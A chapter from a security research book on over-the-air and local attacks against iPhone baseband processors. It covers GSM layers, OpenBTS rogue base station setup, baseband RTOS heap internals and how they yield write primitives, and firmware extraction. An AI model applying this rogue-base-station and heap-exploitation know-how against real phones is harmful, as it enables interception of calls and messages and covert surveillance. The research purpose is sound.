Chapter 11

Baseband Attacks

The communication stack for cellular networks in iOS devices is running on a dedicated chip, the so-called digital baseband processor. Having control over the baseband side of an iPhone allows an adversary to perform a variety of interesting attacks related to the “phone” part of a device, such as monitoring incoming and outgoing calls, performing calls, sending and intercepting short messages, intercepting IP traffic, as well as turning the iPhone into a remotely activated microphone by activating its capability to auto-answer incoming calls. This chapter explores how memory corruptions can be triggered in the baseband software stack and how an attacker can execute custom code on the baseband processor. To attack a device over the air, an adversary would operate a rogue base station in close enough proximity to the target device such that the two can communicate (see Figure 11.1).

Figure 11.1 Basic scenario for a remote baseband attack

11.1

But baseband attacks do not necessarily need to be remote attacks. For a long time, the driving factor for memory corruption research in the baseband stack was the demand for unlocking iPhones; in many countries iPhones are sold at a subsidized price when users buy them bundled with a long-term contract with a carrier. The downside of this practice is that the phone will work only with SIM cards from the carrier that sold the phone. This check — the network lock — is enforced in the baseband processor of the telephone, which talks to the SIM card. The memory corruptions exploited in this context are described as local vulnerabilities when contrasted to the vulnerabilities that can be exploited over the air.

This chapter is concerned only with attacks over the Global System for Telecommunications (GSM) air interface and local attacks through the AT command parser. Although, in principle, attacks over the Code Division Multiple Access (CDMA) air interface might be possible as well, hardware and software for setting up rogue CDMA base stations is much harder to acquire, and attacks against the Qualcomm CDMA stack have not been studied by us nor publicly demonstrated by anyone else thus far. Similarly, although cellular networks in generations later than GSM, such as Universal Mobile Telecommunications Standard (UMTS) and Long Term Evolution (LTE), provide a much richer attack surface, they are not considered in this chapter.

But before getting to the gist of the attacks we describe, we take a brief look at the target environment. Just like the application processor, the baseband processor is an ARM-based CPU; however, it does not run iOS but rather a dedicated real-time operating system (RTOS). Different generations of iPhones and iPads use different baseband processors and RTOSes. Table 11.1 gives an overview of which one is used in which device.

Note
In fact, the baseband processor contains a processing unit other than the CPU: a DSP for modulation/demodulation of the physical layer. In the case of the S-Gold 2, this is a Teaklite core; in other cases, it is an ARM7TDMI design.

Table 11.1 Digital Baseband Processors used in iOS Devices

Processor Devices chip is used in RTOS
Infineon S-Gold 2
 (ARM 926)
iPhone 2G Nucleus PLUS
 (Mentor Graphics)
Infineon X-Gold 608
 (ARM 926)
iPhone 3G/3GS,
 iPad 3G (GSM)
Nucleus PLUS
 (Mentor Graphics)
Infineon X-Gold 618
 (ARM 1176)
iPhone 4,
 iPad 2 3G (GSM)
ThreadX
 (Express Logic)
Qualcomm MDM6600
 (ARM 1136)
iPhone 4 (CDMA)
 iPad 2 3G (CDMA)
REX on OKL4
 (Qualcomm)
Qualcomm MDM6610 (variation of MDM6600) iPhone 4S REX on OKL4 (Qualcomm)

GSM Basics

GSM is a suite of standards for digital cellular communications. It was developed in the 1980s by the European Conference of Postal and Telecommunication Administrators (CEPT); in 1992, development was moved over to the European Telecommunications Standards Institute (ETSI). GSM is considered a second-generation wireless telephony technology and is used to serve more than two billion cellular subscribers in more than 200 countries.

The International Telecommunication Union (ITU) has assigned a total of 14 different frequency bands to the GSM technology; however, only four of them are relevant. In North America, GSM-850 and GSM-1900 are used. In the rest of the world, with the exception of South and Central America, GSM-900 and GSM-1800 are used. In South America, GSM-850 and GSM-1900 are primarily used; however, there are a number of exceptions. All of the GSM-enabled iOS devices are quad-band devices supporting GSM-850, GSM-900, GSM-1800, and GSM-1900. Regardless in which location you turn on your device, all channels on all four bands will be scanned for valid signals.

Let us now quickly dissect the GSM protocol stack. On the physical layer, GSM uses Gaussian Minimum Shift Keying (GMSK) as a modulation scheme; the channels are 200KHz wide and use a bit rate of approximately 270.833 kbit/s. Both Frequency Division Multiple Access (FDMA) and Time Division Multiple Access (TDMA) are employed. To enable simultaneous sending and receiving, a technique called Frequency Division Duplex is employed: Transmission between the Mobile Station (MS) and the Base Transceiver Station (BTS) is achieved on two different frequencies separated by a fixed duplex distance for each band. Data transmitted from the MS to the BTS is sent on the uplink; correspondingly, the opposite direction is called downlink. On top of the physical channels defined by the preceding TDMA scheme, layer 1 of the air interface lays a number of logical channels that are mapped onto the physical channels used by multiplexing. Many different types of logical channels exist — which we do not describe in further detail here — but they can be neatly split into two categories: traffic channels for the transport of user data and signaling channels that transport signaling information, such as location updates, between the BTS and the MS.

Going up in the GSM protocol stack on the Um interface you arrive at layer 2, on which LAPDm, a derivative of ISDN's LAPD (ITU Q.921) and reminiscent of HDLC, is spoken. Data transmitted on layer 2 is encapsulated, using either unnumbered information frames (if acknowledgment, flow control, and layer 2 error correction is not needed) or in information frames (positive acknowledgment, flow control, and layer 2 error control provided). A layer 2 Connection End Point (CEP) is denoted by so-called Data Link Connection Identifiers (DLCI), which are comprised of two elements: a Service Access Point Identifier (SAPI) and a Connection Endpoint Identifier (CEPI).

The next layer of the cellular stack is layer 3, which is divided into three sublayers: Radio Resource Management (RR), Mobility Management (MM), and Connection Management (CM). The RR layer is responsible for the establishment of a link between the MS and the MSC and allocates and configures dedicated channels for this. The MM layer handles all aspects related to the mobility of the device, such as location management, but also authentication of the mobile subscriber. The CM layer can again be split into three distinct sublayers, which are not stacked on top of each other but rather are side by side: Call Control (CC) is the sublayer responsible for functions such as call establishment and teardown. The other sublayers are Supplementary Services (SS) and Short Message Service (SMS). The last two sublayers are independent of calls. See Figure 11.2 for an overview of the GSM Um interface as served by the cellular stack running on the baseband processor.

Figure 11.2 GSM Um interface layers

11.2

Setting up OpenBTS

In recent years, two open-source projects appeared that began building solutions for setting up and running GSM networks. This has significantly lowered the entry cost for performing GSM security research; in fact, one could say that this was the key event enabling baseband attacks to become practical for the average hacker. Although the two projects — OpenBSC and OpenBTS — are similar in their goals, they take different approaches. Whereas OpenBSC uses existing, commercially available GSM base transceiver stations (BTSes) and acts a base station controller (BSC), OpenBTS uses a software-defined radio — the USRP platform — to run a GSM base station completely in software, including modulation and demodulation. OpenBTS reduces the hardware cost of running a GSM base station to less than USD 2000. Next, we detail how to set up your own little GSM network for testing purposes.

Note
GSM operates in a licensed frequency spectrum. Without having obtained permission by the local regulation authority, it is illegal to operate a GSM base station in almost any country. Please check with your legal counsel and local regulating authorities and obtain the required license(s) before continuing.

Hardware Required

OpenBTS uses a software-defined radio approach to implement the BTS side of the Um interface. To operate a GSM network with OpenBTS, you currently need a Universal Software Radio Peripheral (USRP) by Ettus Research, LLC (now owned by National Instruments); in the future OpenBTS might have support for an increased number of software-defined radios. A USRP contains several analog-digital converters (ADCs) and digital-analog converters (DACs) connected to an FPGA. This, in turn, communicates to the host computer through a USB or a Gigabit-Ethernet interface, depending on the model. The actual RF hardware is contained in so-called daughterboards that are mounted onto the USRP mainboard. Ettus sells several transceiver daughterboards covering the GSM frequency ranges, namely the RFX900 covering 750MHz to 1050MHz, the RFX1800 covering 1.5GHz to 2.1GHz, and the WBX board covering 50MHz to 2.2GHz. All of these daughterboards can send and receive at the same time. However, note that in the case of operating the USRP with a single daughterboard, significant leakage of the transmitted signal into the receive circuit occurs, effectively limiting the range of your system. The recommended configuration is to run OpenBTS with two RFX daughterboards. Another thing to note is that RFX1800 can be converted into RFX900 daughterboards by simply reflashing their EEPROM. However, the RFX900 daughterboards contain a filter that suppresses the signal outside of the 900MHz ISM band (frequency range: 902–928 MHz). Therefore, if you bought an RFX900 daughterboard for the transmit side, you either need to remove the ISM filter by de-soldering it or by restricting yourself to the ARFCNs 975-988 in the EGSM900 band.

Unfortunately, the internal clock of the USRP devices is too imprecise to allow reliable operation with anything but the most tolerant of cellphones. Additionally, operating the USRP at 64MHz for GSM isn't recommended; instead you should use a multiple of the GSM bit symbol rate to make downsampling more efficient. For GSM, usually a reference clock of 13MHz (48 times the GSM bit rate) or 26MHz is used to achieve this in handsets, and for the USRP the most common option is to use a 52MHz clock. However, you can feed an external clock signal to the USRP to deal with both of these issues. Please note that feeding an external clock to a USRP1 needs a reclocking modification of the USRP1 motherboard that involves some surface mount soldering. These steps are described on the ClockTamer installation page (https://code.google.com/p/clock-tamer/wiki/ClockTamerUSRPInstallation). The ClockTamer is a small clock generator with optional GPS synchronization that is manufactured by a Russian company called FairWaves; at the same time, it is an open source hardware project. This module fits neatly into the USRP enclosure.

For newer USRPs, such as the USRP2, the E1x0, N2x0, and B1x0 reclocking modifications are not necessary; the clock signal can be simply fed into the external clock input. However, note that to operate these you will need a version of OpenBTS supporting UHD devices.

Note
UHD devices are supported by default in OpenBTS 2.8 and later, but not for OpenBTS 2.6. An OpenBTS 2.6 fork supporting UHD devices exists on github: https://github.com/ttsou/openbts-uhd.

OpenBTS Installation and Configuration

We show you how to install OpenBTS and set up a minimal configuration for playing the role of a malicious base station. The accompanying materials for this book (www.wiley.com/go/ioshackershandbook) include a VirtualBox image that installs all of the dependencies required to operate a USRP1 with a 52MHz clock on first boot and then can be used as a self-contained playground for testing baseband attacks.

The following is a unified diff between the example configuration included in the OpenBTS 2.6 distribution and the configuration used later in this chapter:

--- OpenBTS.config.example      2012-03-12 11:20:43.993739075 +0100
+++ OpenBTS.config      2012-03-12 11:31:27.029729225 +0100
@@ -30,3 +30,3 @@
 # The initial global logging level: ERROR, WARN, NOTICE, INFO, DEBUG, DEEPDEBUG
-Log.Level NOTICE
+Log.Level INFO
 # Logging levels can also be defined for individual source files.
@@ -86,4 +86,4 @@
 # YOU MUST HAVE A MATCHING libusrp AS WELL!!
-TRX.Path ../Transceiver/transceiver
-#TRX.Path ../Transceiver52M/transceiver
+#TRX.Path ../Transceiver/transceiver
+TRX.Path ../Transceiver52M/transceiver
 $static TRX.Path
@@ -182,3 +182,3 @@
 # Things to query during registration updates.
-#Control.LUR.QueryIMEI
+Control.LUR.QueryIMEI
 $optional Control.LUR.QueryIMEI
@@ -197,3 +197,3 @@
 # Maximum allowed ages of a TMSI, in hours.
-Control.TMSITable.MaxAge 72
+Control.TMSITable.MaxAge 24

@@ -259,3 +259,3 @@
 # Location Area Code, 0-65535
-GSM.LAC 1000
+GSM.LAC 42
 # Cell ID, 0-65535
@@ -286,5 +286,5 @@
 # Valid ARFCN range depends on the band.
-GSM.ARFCN 51
+#GSM.ARFCN 51
 # ARCN 975 is inside the US ISM-900 band and also in the GSM900 band.
-#GSM.ARFCN 975
+GSM.ARFCN 975
 # ARFCN 207 was what we ran at BM2008, I think, in the GSM850 band.
@@ -295,3 +295,3 @@
 # Should probably include our own ARFCN
-GSM.Neighbors 39 41 43
+GSM.Neighbors 39 41 975
 #GSM.Neighbors 207

Please take care to adjust GSM.ARFCN, GSM.Band and GSM.Neighbours according to the frequency that you have been authorized to transmit on.

Note that by default you are running OpenBTS in a so-called open configuration — meaning that any mobile device that tries to register with the test network will allowed to. This may have unwanted side effects, especially if you have not properly limited your transmission power and/or are in an area where other networks only have weak signals. Devices may inadvertently roam into your network. To prevent this, you can run OpenBTS in a closed configuration that requires each IMSI to be registered with Asterisk.

After having connected your hardware, you should perform a simple check to see whether everything is set up correctly. For this test, you can use the testcall functionality that you will later also use to transmit raw GSM layer 3 messages. First, install the libmich library (from https://github.com/mitshell/libmich, not required if you use the virtual machine provided), a nifty library to create layer 3 messages using a Python interface. Next, start OpenBTS and register your iPhone with the test network. To select the test network, disable the automatic selection of the network in the Carrier section of the Settings application and choose the mobile network with the name 00101.

If you have trouble seeing or registering with your test network, it can help to put the iPhone into airplane mode for at least 5 seconds. Disable airplane mode after that and perform the network selection procedure again; your phone will now perform a full scan.

After having registered with the network, you can simulate the first stage of a call establishment. Use the following commands to set up a traffic channel to the iPhone:

OpenBTS> tmsis
TMSI       IMSI            IMEI(SV)           age  used
0x4f5e0ccc 262XXXXXXXXXXXX 01XXXXXXXXXXXXXX  293s  293s

1 TMSIs in table
OpenBTS> testcall 262XXXXXXXXXXXX 60

OpenBTS> calls
1804289383 TI=(1,0) IMSI=262XXXXXXXXXXXX Test from=0 Q.931State=active
SIPState=Null (2 sec)
1 transactions in table

In the previous example, the command tmsis shows a mapping of the Temporary Mobile Subscriber Identitiy (TMSI) of the registered iPhone to its International Mobile Subscriber Identity (IMSI) together with the International Mobile Equipment Identity and Software Version (IMEISV) as well as the time of initial registration and the time of last use. The testcall command opens a UDP socket — by default on port 28670 — and a traffic channel to the mobile device specified by IMSI in the second argument. The number of seconds this channel should be held open is specified in the second argument. This allows you to send datagrams to the UDP port that are forwarded as GSM layer 3 packets to the mobile device and vice versa. At any time, only a single testcall instance can be active. To see which calls are established you can use the calls command.

You then run the following simple Python script in another terminal to simulate call setup:

import socket
import time
from libmich.formats import *

TESTCALL_PORT = 28670

tcsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tcsock.sendto(str(L3Mobile.SETUP()), (‘127.0.0.1’, TESTCALL_PORT))

After you execute this script, your iPhone should ring. Please note that you are not following the state transitions after sending the initial call setup message; hence the phone will appear to be frozen while ringing. Simply shut down OpenBTS if this test has worked.

Closed Configuration and Asterisk Dialing Rules

You did not have to configure Asterisk in the previous description because you were operating OpenBTS in open configuration. If you want to operate OpenBTS in closed configuration or to make calls between multiple registered phones on your test network, you will not be able to get around at least a basic configuration of Asterisk. As a bare minimum, you can simply append the following lines to the default extensions.conf

[sip-openbts]
exten => 6666,1,Dial(SIP/IMSI2620XXXXXXXXX)
exten => 7777,1,Dial(SIP/IMSI2620YYYYYYYYYYY)

and the following lines to the default sip.conf:

 [IMSI2620XXXXXXXXXXX]
callerid=6666
canreinvite=no
type=friend
context=sip-openbts
allow=gsm
host=dynamic

[IMSI2620YYYYYYYYYY]
callerid=7777
canreinvite=no
type=friend
context=sip-openbts
allow=gsm
host=dynamic

Please make sure that both the context and the IMSI identifiers match between sip.conf and extensions.conf.

RTOSes Underneath the Stacks

The cellular baseband of a modern smartphone can be seen as an independent subsystem — it is running its own operating system on its own processor with dedicated coprocessors (for example, DSPs, crypto, and 3G coprocessors). This can be attributed to the real-time requirements for cellular communications. Consequently, the operating systems running underneath the cellular stack are dedicated real-time operating systems, sometimes proprietary to the vendor of the baseband stack — as in the case of Qualcomm's REX. More commonly, however, the owner of the cellular stack simply has licensed a commercially available OS on which to run his cellular stack. The primary tasks of these operating systems is to manage resources such as processors, memory, and attached devices — efficiently, and with real-time constraints — which makes them often appear much different than a desktop operating system, although they are not.

The following sections give you a brief exposition of the three different real-time operating systems that are in use by different versions of iOS devices. They also explain how task/thread control, inter-task/thread communication and locking mechanisms, memory management, and memory protection work for each of them.

Nucleus PLUS

Nucleus PLUS is a widely used commercial RTOS distributed by Mentor Graphics. It is shipped in source form to the paying licensees. The baseband of the S-Gold 2 as well as of the X-Gold 608 run on Nucleus PLUS. Unfortunately, no good public documentation on Nucleus PLUS is available; however, the official manuals have leaked.

Units of execution in Nucleus PLUS are called tasks. Tasks can be dynamically created and deleted in Nucleus PLUS and run at a priority defined at task creation time. For each priority level, all tasks on this level are run time sliced in a round-robin fashion; they can also explicitly relinquish the processor. Tasks can preempt other tasks that have a lower priority. Preemption can be disabled — not only globally but also for each task individually. Interrupt Service Routines (ISR) are different kinds of execution units. Several different types of ISRs are distinguished. The first kind is the User ISR, which cannot use any Nucleus PLUS services and needs to save and restore the registers it uses itself. They are tied directly to an interrupt vector and are not registered through Nucleus PLUS. Next are low-level ISRs (LISRs), which are first-level interrupt handlers; and high-level ISRs (HISRs), which are second-level interrupt handlers. LISRs have only limited access to Nucleus PLUS services and are tied to an interrupt vector, whereas HISRs are scheduled similarly to tasks and may call most of the Nucleus PLUS services.

Nucleus PLUS distinguishes two different kinds of memory allocations: partition memory and dynamic memory. Both types of memories are managed in memory pools that need to be defined first before allocations can be taken from them. Tasks can be suspended when the allocation cannot be immediately performed, causing them to wait until a suitable chunk of memory becomes free. Partition memory is a form of memory that allows allocations only in fixed-sized blocks. Each call to the allocation function obtains one block of exactly that fixed size from the pool. This type of memory management is very common for embedded systems with real-time constraints because it allows memory allocations to occur with constant execution time. Moreover, partition memory is more space efficient because there is no need to store allocation meta data for the blocks. Dynamic memory, on the other hand, allows variable-sized allocations from the pool, similar to a regular malloc() implementation. (Please also consult the “Heap Implementations” section later in this chapter for the internals of the heap implementations.)

For task synchronization and mutual exclusion semaphores can be used. The semaphores implemented by Nucleus PLUS are counting semaphores.

Several means exist for tasks to communicate with each other: Mailboxes can be dynamically created and deleted. They are the most primitive means for data transfer. Each mailbox can hold only a single message consisting of exactly four 32-bit words. More powerful primitives are pipes and queues: Now you can send multiple messages that consist of one or more bytes (pipes), respectively 32-bit words (queues). Both variable-and fixed-length pipes and queues can be created; their type is defined at time of creation. Messages are sent and received by value and not by reference; broadcast messages are supported, and all tasks waiting for a message from a queue will wake up and receive these messages.

Other concepts for signaling and synchronization between tasks supported by Nucleus PLUS are event groups, and signals. All of these, however, have an extremely limited bandwidth.

ThreadX

ThreadX is the direct successor of Nucleus PLUS; both operating systems were written by the same software engineer, William Lamie. Just like Nucleus, ThreadX is distributed to licensees in source form, but by a different company — Express Logic. Compared to Nucleus PLUS, the complexity of the API has significantly decreased, and the interrupt architecture was overhauled. In contrast to the other operating systems described in this chapter, Edwards C. Lamie offers Real-Time Embedded Multithreading: Using ThreadX and ARM (ISBN 1578201349 CMP, 2005) which is a good book on ThreadX that covers its implementation in detail. Due to this fact and its close relation to Nucleus PLUS, we do not further describe its idiosyncrasies in this chapter.

REX/OKL4/Iguana

Real-time Executive System (REX) is an RTOS developed by Qualcomm for its Mobile Station Modem (MSM) products. It is employed by the Advanced Mobile Subscriber Software (AMSS) running on the MDM66x0 chips. Beginning in late 2006, Qualcomm made a major design innovation to its cellular stack: An L4-derived microkernel, OKL4, was propped underneath REX. Luckily, some versions of OKL4 are freely available in source form, which significantly simplifies the analysis of AMSS.

OKL4 is merely the microkernel of the system. The actual meat of the operating system, such as virtual memory management and process management, is implemented in Iguana, an L4 server, for which source code is freely available. The unit of execution in Iguana and L4 is called a thread. In fact, Iguana threads are L4 threads and can be manipulated through the L4 API as well as through an Iguana API.

Iguana uses a single address space to make sharing of data efficient and employs per-process protection domains to enforce its security policy. A protection domain can be seen as the equivalent of a process in a traditional operating system and defines what resources a process can access.

Memory sections are contiguous ranges of virtual pages; they are the basic units of virtual memory allocation and protection in Iguana. Memory sections can be created both at boot time and at run time using memsection_create().

A significant difference between OKL4/Iguana and the other operating systems discussed in this chapter is that only the operating system and not the actual application — in our case the cellular stack — runs in supervisor mode. AMSS, including drivers, is completely run in user mode.

Heap Implementations

This section dives in head first into the internals of heap memory management of the operating systems. You should be somewhat familiar with exploiting heap buffer overflows already to make use of the information presented here.

Dynamic Memory in Nucleus PLUS

Nucleus PLUS uses a simplistic first-fit allocator for managing dynamic memory. For each pool created using NU_Create_Memory_Pool(), a pool control block of the following layout is created:

struct dynmem_pcb

{
    void               *cs_prev;      
    void               *cs_next;
    uint32_t            cs_prio;
    void               *tc_tcb_ptr;
    uint32_t            tc_wait_flag;
    uint32_t            id;            /* magic value [‘DYNA’]   */
    char                name[8];       /* Dynamic Pool name      */
    void               *start_addr;    /* Starting pool address  */
    uint32_t            pool_size;     /* Size of pool           */
    uint32_t            min_alloc;     /* Minimum allocate size  */
    uint32_t            available;     /* Total available bytes  */
    struct dynmem_hdr  *memory_list;   /* Memory list            */
    struct dynmem_hdr  *search_ptr     /* Search pointer         */
    uint32_t            fifo_suspend;  /* Suspension type flag   */
    uint32_t            num_waiting;   /* Number of waiting tasks*/
    void               *waiting_list;  /* Suspension list        */
};

Each chunk of memory allocated with NU_Allocate_Memory() has a header of the following structure (16 bytes):

struct dynmem_hdr
{
    struct dynmem_hdr  *next_blk,        /* Next memory block      */
                       *prev_blk;        /* Previous memory block  */
    bool                is_free;         /* Memory block free flag */
    struct dynmem_pcb  *pool_pcb;        /* Dynamic pool pointer   */
}

Initially, before dynamic memory can be allocated, at least one pool needs to be created with NU_Create_Memory_Pool(pcb, name, start_addr, size, min_alloc, suspend_t):

  • pcb — Pointer to the pool control block
  • name — A name for the pool, in ASCII
  • start_addr — First address in memory that can be used for allocations from this pool
  • pool_size — Size of the pool, in bytes
  • min_alloc — Minimal allocation size in bytes (smaller allocations will be rounded up to min_alloc)
  • suspend_t — Type of suspension (FIFO or not)

This pool causes the pcb to be initialized, with a single chunk of size (pool_size - 2 * dynmem_hdr) ending up in the cyclic list pointed to by pcb->memory_list.

Allocating a chunk of memory with NU_Allocate_Memory(pcb, &ptr_to_allocation, size, NU_NO_SUSPEND) then causes the following algorithm to be executed:

1. Iterate over the memory list pointed to by pcb->search_ptr using a variable called mem_ptr:.
For each memory block, check whether the is_free flag is set. If this is the case, let memblk_size = (mem_ptr->next_blk – mem_ptr - 16). Now check memblk_size >= size. If this is fulfilled, the algorithm has found a suitable block.
2. If no block can be found, return error condition or suspend task (depending on whether suspension is allowed).
3. If (memblk_size – size) > (min_alloc + 16), break memory chunk into two chunks and insert the free chunk back into the list.

To deallocate a memory block using NU_Deallocate_Memory(blk), the deallocation function assumes that blk is preceded by a dynmem_hdr.

No checks are performed on the dynmem_hdr structure itself, but it is checked that the pool pointer is not NULL, and that the magic value in the pool control block matches. After having marked the block as free again and having adjusted the number of available bytes in the pool, the function first checks whether the freed block can be merged with its previous block, then it checks whether it can be merged with the next block by looking at the is_free flags of the header of these blocks. This procedure is commonly called coalescing. This is the operation that gives an attacker a so-called unrestricted write4 primitive, a powerful way to turn a heap buffer overflow into the ability to write an arbitrary 32-bit value at any location in memory.

Byte Pools in ThreadX

ThreadX also uses a first-fit allocator that works in a very similar fashion to the one described for Nucleus PLUS; yet it still is distinct enough to warrant a detailed description of its own. The control block of a byte pool has the following structure (taken from tx_api.h):

typedef struct TX_BYTE_POOL_STRUCT
{
    /* Define the byte pool ID used for error checking.  */
    ULONG       tx_byte_pool_id;
    /* Define the byte pool's name.  */
    CHAR_PTR    tx_byte_pool_name;
    /* Define the number of available bytes in the pool.  */
    ULONG       tx_byte_pool_available;
    /* Define the number of fragments in the pool.  */
    ULONG       tx_byte_pool_fragments;
    /* Define the head pointer of byte pool.  */
    CHAR_PTR    tx_byte_pool_list;
    /* Define the search pointer used for initial searching for memory
       in a byte pool.  */
    CHAR_PTR    tx_byte_pool_search;
    /* Save the start address of the byte pool's memory area.  */
    CHAR_PTR    tx_byte_pool_start;
    /* Save the byte pool's size in bytes.  */
    ULONG       tx_byte_pool_size;
    /* This is used to mark the owner of the byte memory pool during
       a search.  If this value changes during the search, the local search
       pointer must be reset.  */
    struct TX_THREAD_STRUCT  *tx_byte_pool_owner;

    /* Define the byte pool suspension list head along with a count of
       how many threads are suspended.  */
    struct TX_THREAD_STRUCT  *tx_byte_pool_suspension_list;
    ULONG                    tx_byte_pool_suspended_count;
    /* Define the created list next and previous pointers.  */
    struct TX_BYTE_POOL_STRUCT
                *tx_byte_pool_created_next,   
                *tx_byte_pool_created_previous;
} TX_BYTE_POOL;

The header of a memory block simply consists of a field for indicating whether this particular memory chunk is allocated (indicated by the magic value 0xFFFFEEEE) or still considered “free” and a pointer back to the byte pool control block:

struct bpmem_hdr {
    uint32_t is_free_magic;   /* set to 0xFFFFEEEE if block is free */
    TX_BYTE_POOL bpcb;        /* pointer to control block of byte memory pool */
}

The tx_byte_allocate() function, used to allocate a block of memory from a given pool, does not traverse tx_byte_pool_list directly, but rather calls a function, find_byte_block(), that does this. The same function also is called from tx_byte_release() if another thread has suspended on the pool. Coalescing does not happen directly when a block of memory is freed, but is delayed. Only the field is_free_magic of the header is updated on the call of tx_byte_release() if no other threads are waiting. Rather, coalescing of adjacent memory blocks marked as free happens in find_byte_block() in case no memory block of the requested size can be found.

The Qualcomm Modem Heap

Looking closely at a Qualcomm stack, you will see that AMSS actually uses several different heap implementations. Because the Iguana allocator is not used for buffers allocated by the modem stack, it does not make sense for us to describe this allocator here. Rather, we investigate the most widely used allocator, which seems to be something like a system allocator on AMSS and is assumed to be called modem_mem_alloc() judging from strings found in the amss.mbn binary.

In contrast to the previous allocators, this allocator is a best-fit allocator that is significantly more complicated than the previously described allocators and is somewhat hardened. We will not be able to describe the allocator in full detail here, but rather will concentrate on the most relevant features of it that will allow you to get a head start in further reverse-engineering:

Instead of having one list of memory chunks, the allocator keeps 31 bins of memory chunks of different sizes: These bins can accommodate memory allocations up to 0x4, 0x6, 0x8, 0xC, 0x10, 0x18, 0x20, 0x30, 0x40, 0x60, 0x80, 0xC0, 0x100, 0x180, 0x200, 0x300, 0x400, 0x600, 0x800, 0xC00, 0x1000, 0x1800, 0x2000, 0x3000, 0x4000, 0x6000, 0x8000, 0xC000, 0x10000, 0x18000 and 0x20000 respectively. The actual sizes of the blocks in the bins are 16 bytes larger than the size indicated by the bin to account for metadata and align to an 8-byte boundary. The header of a memory block looks as follows:

struct mma_header {
       uint32_t size;        /* size of allocation */
       uint32_t *next;       /* pointer to next block */
       uint8_t reference;   
       /* reference value to distinguish different callers */
       uint8_t blockstatus;  /* determines whether block is free or taken */
       uint8_t slackspace;   /* slack space at end of block */
       uint8_t canary;       /* canary value to determine memory corruption */
}

For free blocks the following data structure is used:

struct mma_free_block {
       mma_header hdr;
       mma_header *next_free, *prev_free;
      /* doubly linked list of free blocks */
}

The canary value used by the allocator is 0x6A. Whenever mma_header structure is accessed, a check is performed to determine whether the canary value is still intact; a crash will be forced if it is not the case. This feature however is mostly relevant for accidental and not for intentional memory corruptions; it is something to keep in mind when trying to fuzz the stack, however. Another noteworthy feature for heap exploitation is the fact that the allocator checks whether pointers that are passed to the modem_mem_free(ptr) function really point to a memory area used by the heap. Creating fake heap structures on the stack henceforth will not work.

As of iOS 5.1, the heap allocator described previously has been hardened by adding a safe-unlinking check: Before performing an unlinking operating, the allocator will check whether free_block->next_free->prev_free == free_block->prev_free->next_free.

Vulnerability Analysis

The previous subsections of this chapter covered the ground you need to be familiar with by providing just enough details about GSM and real-time operating systems to proceed to the core of the matter: finding exploitable vulnerabilities. Before we get there, we still need to explain a couple of operational matters to get to the actual analysis.

Obtaining and Extracting Baseband Firmware

Upgrades of the baseband firmware are performed during the normal iOS upgrade/restore process. For older iPhones, up to the 3GS as well as the iPad 1, this firmware is contained in the ramdisk image. To extract it, you need to decrypt this image, mount it, and copy the firmware image from /usr/local/standalone/firmware. To extract the iPhone 2G baseband firmware ICE04.05.04_G.fls from the decrypted iOS 3.1.3 update, you can use the following sequence of steps once you have planetbeing's wonderful xpwntool installed (you can download it from https://github.com/planetbeing/xpwn).

$ wget -q http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/
061-7481.20100202.4orot/iPhone1,1_3.1.3_7E18_Restore.ipsw
$ unzip iPhone1,1_3.1.3_7E18_Restore.ipsw 018-6488-015.dmg
Archive:  iPhone1,1_3.1.3_7E18_Restore.ipsw
  inflating: 018-6494-014.dmg
$ xpwntool 018-6494-014.dmg restore.dmg -k 7029389c2dadaaa1d1e51bf579493824 -iv
 25e713dd5663badebe046d0ffa164fee
$ open restore.dmg
$ cp /Volumes/ramdisk/usr/local/standalone/firmware/ICE04.05.04_G.fls .
$ hdiutil eject /Volumes/ramdisk
Note
The keys used as arguments to xpwntool in the above can be found on the iPhone Wiki (http://theiphonewiki.com/wiki/index.php?title=VFDecrypt_Keys).

For newer iPhones and the iPad 2, the baseband firmware can be directly extracted from the IPSW using unzip. In Listing 11.1, the ICE3 firmware is the version running on the X-Gold 61x in the iPhone 4, and the Trek file is used to upgrade the firmware running on the MDM6610 in the iPhone 4S.

Listing 11.1: Baseband firmwares contained in the iPhone 4S 5.0.1 update

$ unzip -l iPhone4,1_5.0.1_9A406_Restore.ipsw Firmware/[IT]*bbfw
Archive:  iPhone4,1_5.0.1_9A406_Restore.ipsw
  Length     Date   Time    Name
 --------    ----   ----    ----
  3815153  12-04-11 02:07   Firmware/ICE3_04.11.08_BOOT_02.13.Release.bbfw
 11154725  12-04-11 02:07   Firmware/Trek-1.0.14.Release.bbfw
 --------                   -------
 14969878                   2 files

The .bbfw files themselves are ZIP archives as well and contain the actual baseband firmware together with a number of loaders:

$ unzip -l ICE3_04.11.08_BOOT_02.13.Release.bbfw
Archive:  ICE3_04.11.08_BOOT_02.13.Release.bbfw
  Length     Date   Time    Name
 --------    ----   ----    ----
    72568  01-13-11 04:14   psi_ram.fls
    64892  01-13-11 04:14   ebl.fls
  7308368  12-04-11 02:07   stack.fls
    40260  01-13-11 04:14   psi_flash.fls
 --------                   -------
  7486088                   4 files

$ unzip -l Trek-1.0.14.Release.bbfw
Archive:  Trek-1.0.14.Release.bbfw
  Length     Date   Time    Name
 --------    ----   ----    ----
 19599360  12-03-11 10:06   amss.mbn
   451464  12-03-11 10:06   osbl.mbn
   122464  12-03-11 10:06   dbl.mbn
   122196  12-03-11 10:06   restoredbl.mbn
 --------                   -------
 20295484                   4 files

Here we are only interested in the stack.fls for the X-Gold and in the amss.mbn for the MDM66x0 chipsets. All other files are loader files, which we don't investigate further; although these may in principle contain security-critical bugs — for instance, in the signature verification of the firmware, which would allow you to run different firmware on the phone and hence unlock it.

Loading Firmware Images into IDA Pro

Infineon .fls files are built using an official ARM Compiler Toolchain — either ARM RealView Suite (RVDS) or ARM Development Suite (ADS), depending on the version of the baseband firmware. The ARM linker employs a so-called “scatter loading” mechanism to save flash space. In the link run, all code segments and data segments with initialized data are concatenated; optionally, segments can be compressed using one of two simple run-length encoding algorithms. A table is built with pointers to these regions and entries for regions that need to be zero-initialized. During run time, startup code iterates over this table, copies the segments to their actual locations in memory, and creates zero-initialized memory regions as specified.

